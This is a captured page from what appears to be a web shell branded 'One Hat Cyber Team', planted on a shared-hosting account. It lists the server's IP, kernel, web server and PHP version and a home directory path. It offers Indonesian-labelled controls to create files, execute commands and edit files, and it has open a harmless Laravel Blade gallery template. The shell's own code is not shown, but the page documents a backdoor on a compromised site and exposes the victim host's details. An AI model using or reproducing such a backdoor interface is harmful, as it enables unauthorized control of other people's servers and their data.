⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.140
Server IP:
68.65.123.197
Server:
Linux premium49.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
smarbgfw
/
www
/
updater
/
resources
/
views
/
front
/
Edit File: gallery.blade.php
@extends("front.$version.layout") @section('pagename') - {{__('Gallery')}} @endsection @section('meta-keywords', "$be->gallery_meta_keywords") @section('meta-description', "$be->gallery_meta_description") @section('breadcrumb-title', $bs->gallery_title) @section('breadcrumb-subtitle', $bs->gallery_subtitle) @section('breadcrumb-link', __('GALLERY')) @section('content')
@if (count($categories) > 0 && $bex->gallery_category_status == 1)
{{__('All')}}
@foreach ($categories as $category) @php $filterValue = "." . Str::slug($category->name); @endphp
{{ convertUtf8($category->name) }}
@endforeach
@endif
@if (count($galleries) == 0)
{{ __('No Gallery Image Found!') }}
@else @foreach ($galleries as $gallery) @php $galleryCategory = $gallery->galleryImgCategory()->first(); if (!empty($galleryCategory)) { $categoryName = Str::slug($galleryCategory->name); } else { $categoryName = ""; } @endphp
@endforeach @endif
@endsection @section('scripts') @endsection
Simpan